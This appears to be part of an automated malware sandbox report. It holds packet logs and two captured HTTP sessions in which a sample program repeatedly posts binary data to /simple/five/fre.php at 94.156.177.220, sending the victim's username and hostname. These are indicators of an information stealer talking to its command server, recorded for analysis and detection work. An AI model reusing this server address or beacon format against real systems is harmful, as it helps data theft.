                                  Oct 25, 2024 10:21:32.346360922 CEST4999180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:32.352161884 CEST804999194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:32.352236032 CEST4999180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:32.357851982 CEST804999194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:33.334688902 CEST804999194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:33.334820986 CEST4999180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:33.340435982 CEST804999194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:33.342763901 CEST4999180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:33.481662989 CEST4999880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:33.487065077 CEST804999894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:33.487175941 CEST4999880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:33.489151001 CEST4999880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:33.496249914 CEST804999894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:33.496323109 CEST4999880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:33.501665115 CEST804999894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:34.472930908 CEST804999894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:34.473110914 CEST4999880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:34.478912115 CEST804999894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:34.480921984 CEST4999880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:34.635317087 CEST5000580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:34.641180992 CEST805000594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:34.641263008 CEST5000580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:34.644509077 CEST5000580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:34.650415897 CEST805000594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:34.650471926 CEST5000580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:34.656075001 CEST805000594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:35.623763084 CEST805000594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:35.623881102 CEST5000580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:35.629820108 CEST805000594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:35.629884958 CEST5000580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:35.768284082 CEST5001480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:35.773655891 CEST805001494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:35.773786068 CEST5001480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:35.776802063 CEST5001480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:35.782202959 CEST805001494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:35.782291889 CEST5001480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:35.787607908 CEST805001494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:36.765660048 CEST805001494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:36.765799999 CEST5001480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:36.772728920 CEST805001494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:36.772818089 CEST5001480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:36.907793999 CEST5002180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:36.913394928 CEST805002194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:36.913476944 CEST5002180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:36.916836023 CEST5002180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:36.922523022 CEST805002194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:36.922599077 CEST5002180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:36.928329945 CEST805002194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:37.889924049 CEST805002194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:37.890034914 CEST5002180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:37.895859957 CEST805002194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:37.895946026 CEST5002180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:38.055980921 CEST5002780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:38.062417984 CEST805002794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:38.062511921 CEST5002780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:38.065571070 CEST5002780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:38.071510077 CEST805002794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:38.071599007 CEST5002780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:38.077544928 CEST805002794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:39.040096045 CEST805002794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:39.040400028 CEST5002780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:39.046534061 CEST805002794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:39.046617031 CEST5002780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:39.191823959 CEST5003380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:39.197257042 CEST805003394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:39.197359085 CEST5003380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:39.199455023 CEST5003380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:39.204767942 CEST805003394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:39.204843044 CEST5003380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:39.210155010 CEST805003394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:40.344208956 CEST805003394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:40.344341040 CEST5003380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:40.350403070 CEST805003394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:40.350474119 CEST5003380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:40.485609055 CEST5003980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:40.491167068 CEST805003994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:40.491261959 CEST5003980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:40.493951082 CEST5003980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:40.499747038 CEST805003994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:40.499809980 CEST5003980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:40.505490065 CEST805003994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:41.490698099 CEST805003994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:41.490818024 CEST5003980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:41.496560097 CEST805003994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:41.496651888 CEST5003980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:41.638991117 CEST5005080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:41.646015882 CEST805005094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:41.646161079 CEST5005080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:41.648252010 CEST5005080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:41.653844118 CEST805005094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:41.653913975 CEST5005080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:41.659487963 CEST805005094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:42.628232956 CEST805005094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:42.628355980 CEST5005080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:42.635639906 CEST805005094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:42.635705948 CEST5005080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:42.761641026 CEST5005680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:42.767433882 CEST805005694.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:42.767553091 CEST5005680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:42.769633055 CEST5005680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:42.775172949 CEST805005694.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:42.775265932 CEST5005680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:42.780829906 CEST805005694.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:43.771524906 CEST805005694.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:43.771661043 CEST5005680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:43.777736902 CEST805005694.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:43.777789116 CEST5005680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:43.924614906 CEST5006280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:43.929955959 CEST805006294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:43.930028915 CEST5006280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:43.932138920 CEST5006280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:43.937606096 CEST805006294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:43.937768936 CEST5006280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:43.943192959 CEST805006294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:44.921889067 CEST805006294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:44.922013998 CEST5006280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:44.927928925 CEST805006294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:44.928004026 CEST5006280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:45.063291073 CEST5007380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:45.069022894 CEST805007394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:45.069242954 CEST5007380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:45.071362972 CEST5007380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:45.077105045 CEST805007394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:45.077227116 CEST5007380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:45.082832098 CEST805007394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:46.047409058 CEST805007394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:46.047554970 CEST5007380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:46.053961039 CEST805007394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:46.054039001 CEST5007380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:46.188684940 CEST5007880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:46.194499969 CEST805007894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:46.194623947 CEST5007880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:46.196688890 CEST5007880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:46.202194929 CEST805007894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:46.202322960 CEST5007880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:46.207716942 CEST805007894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:47.209161997 CEST805007894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:47.209475040 CEST5007880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:47.216254950 CEST805007894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:47.216434956 CEST5007880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:47.363806963 CEST5008580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:47.369515896 CEST805008594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:47.369745970 CEST5008580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:47.371918917 CEST5008580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:47.377293110 CEST805008594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:47.377458096 CEST5008580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:47.382850885 CEST805008594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:48.343065023 CEST805008594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:48.343221903 CEST5008580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:48.349011898 CEST805008594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:48.349071980 CEST5008580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:48.488389015 CEST5008880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:48.493879080 CEST805008894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:48.493952036 CEST5008880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:48.496957064 CEST5008880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:48.502445936 CEST805008894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:48.502507925 CEST5008880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:48.508037090 CEST805008894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:49.488792896 CEST805008894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:49.489043951 CEST5008880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:49.494903088 CEST805008894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:49.494980097 CEST5008880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:49.645447016 CEST5008980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:49.651030064 CEST805008994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:49.651113987 CEST5008980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:49.654278040 CEST5008980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:49.659766912 CEST805008994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:49.659828901 CEST5008980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:49.665236950 CEST805008994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:50.626844883 CEST805008994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:50.627196074 CEST5008980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:50.633330107 CEST805008994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:50.633413076 CEST5008980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:51.365036964 CEST5009080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:51.370995998 CEST805009094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:51.371249914 CEST5009080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:51.492516994 CEST5009080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:51.498225927 CEST805009094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:51.498323917 CEST5009080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:51.503798962 CEST805009094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:52.356110096 CEST805009094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:52.356229067 CEST5009080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:52.362706900 CEST805009094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:52.362771034 CEST5009080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:52.503968954 CEST5009180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:52.509531021 CEST805009194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:52.509637117 CEST5009180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:52.512600899 CEST5009180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:52.518146038 CEST805009194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:52.518212080 CEST5009180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:52.523916960 CEST805009194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:53.474535942 CEST805009194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:53.474653006 CEST5009180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:53.481146097 CEST805009194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:53.481208086 CEST5009180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:53.635937929 CEST5009280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:53.641496897 CEST805009294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:53.641597033 CEST5009280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:53.643651009 CEST5009280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:53.649079084 CEST805009294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:53.649173021 CEST5009280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:53.654597998 CEST805009294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:54.627542973 CEST805009294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:54.628216028 CEST5009280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:54.634279966 CEST805009294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:54.634483099 CEST5009280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:54.795806885 CEST5009380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:54.801275015 CEST805009394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:54.801362991 CEST5009380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:54.804053068 CEST5009380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:54.809382915 CEST805009394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:54.809439898 CEST5009380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:54.814842939 CEST805009394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:55.754867077 CEST805009394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:55.755063057 CEST5009380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:55.761442900 CEST805009394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:55.761511087 CEST5009380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:55.909813881 CEST5009480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:55.915513039 CEST805009494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:55.915657043 CEST5009480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:55.918642998 CEST5009480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:55.924674988 CEST805009494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:55.924734116 CEST5009480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:55.930183887 CEST805009494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:56.895411015 CEST805009494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:56.895577908 CEST5009480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:56.901726007 CEST805009494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:56.901824951 CEST5009480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:57.159589052 CEST5009580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:57.165127993 CEST805009594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:57.165231943 CEST5009580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:57.167407990 CEST5009580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:57.172780037 CEST805009594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:57.172837019 CEST5009580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:57.178184986 CEST805009594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:58.166055918 CEST805009594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:58.166255951 CEST5009580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:58.172981024 CEST805009594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:58.173064947 CEST5009580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:58.323759079 CEST5009680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:58.330338955 CEST805009694.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:58.330440998 CEST5009680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:58.333457947 CEST5009680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:58.338972092 CEST805009694.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:58.339191914 CEST5009680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:58.344657898 CEST805009694.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:59.355499983 CEST805009694.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:59.355700970 CEST5009680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:59.361506939 CEST805009694.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:59.361584902 CEST5009680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:59.513612986 CEST5009780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:59.519726992 CEST805009794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:59.519845009 CEST5009780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:59.521910906 CEST5009780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:59.527431965 CEST805009794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:59.527534962 CEST5009780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:59.532994032 CEST805009794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:22:00.528371096 CEST805009794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:22:00.539506912 CEST5009780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:22:00.545384884 CEST805009794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:22:00.545455933 CEST5009780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:22:01.004046917 CEST5009880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:22:01.009598017 CEST805009894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:22:01.009689093 CEST5009880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:22:01.011735916 CEST5009880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:22:01.017510891 CEST805009894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:22:01.017570972 CEST5009880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:22:01.023061037 CEST805009894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:22:02.033549070 CEST805009894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:22:02.033726931 CEST5009880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:22:02.039544106 CEST805009894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:22:02.039632082 CEST5009880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:22:02.170727968 CEST5009980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:22:02.176131964 CEST805009994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:22:02.176211119 CEST5009980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:22:02.178251028 CEST5009980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:22:02.183757067 CEST805009994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:22:02.183819056 CEST5009980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:22:02.189198971 CEST805009994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:22:03.140045881 CEST805009994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:22:03.140266895 CEST5009980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:22:03.146388054 CEST805009994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:22:03.146495104 CEST5009980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:22:04.432774067 CEST5010080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:22:04.438590050 CEST805010094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:22:04.438688040 CEST5010080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:22:04.440668106 CEST5010080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:22:04.446038961 CEST805010094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:22:04.446101904 CEST5010080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:22:04.451592922 CEST805010094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:22:05.409997940 CEST805010094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:22:05.410347939 CEST5010080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:22:05.416568041 CEST805010094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:22:05.416662931 CEST5010080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:22:05.562225103 CEST5010180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:22:05.568342924 CEST805010194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:22:05.568434954 CEST5010180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:22:05.570533037 CEST5010180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:22:05.575944901 CEST805010194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:22:05.576112032 CEST5010180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:22:05.581444025 CEST805010194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:22:06.540014029 CEST805010194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:22:06.540301085 CEST5010180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:22:06.546216965 CEST805010194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:22:06.546328068 CEST5010180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:22:06.693769932 CEST5010280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:22:06.699457884 CEST805010294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:22:06.699670076 CEST5010280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:22:06.704200983 CEST5010280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:22:06.709630013 CEST805010294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:22:06.709690094 CEST5010280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:22:06.715267897 CEST805010294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:22:07.661010981 CEST805010294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:22:07.717612028 CEST5010280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:22:07.827410936 CEST805010294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:22:07.827462912 CEST5010280192.168.2.494.156.177.220
                                  • 94.156.177.220
                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.44973094.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:01.417874098 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 176
                                  Connection: close
                                  Oct 25, 2024 10:20:01.424021959 CEST176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: 'ckav.rujones965543JONES-PCk0FDD42EE188E931437F4FBE2CF22Dz
                                  Oct 25, 2024 10:20:02.396137953 CEST228INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:02 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 15
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.44973194.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:03.042490005 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 176
                                  Connection: close
                                  Oct 25, 2024 10:20:03.047947884 CEST176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: 'ckav.rujones965543JONES-PC+0FDD42EE188E931437F4FBE2C25tbq
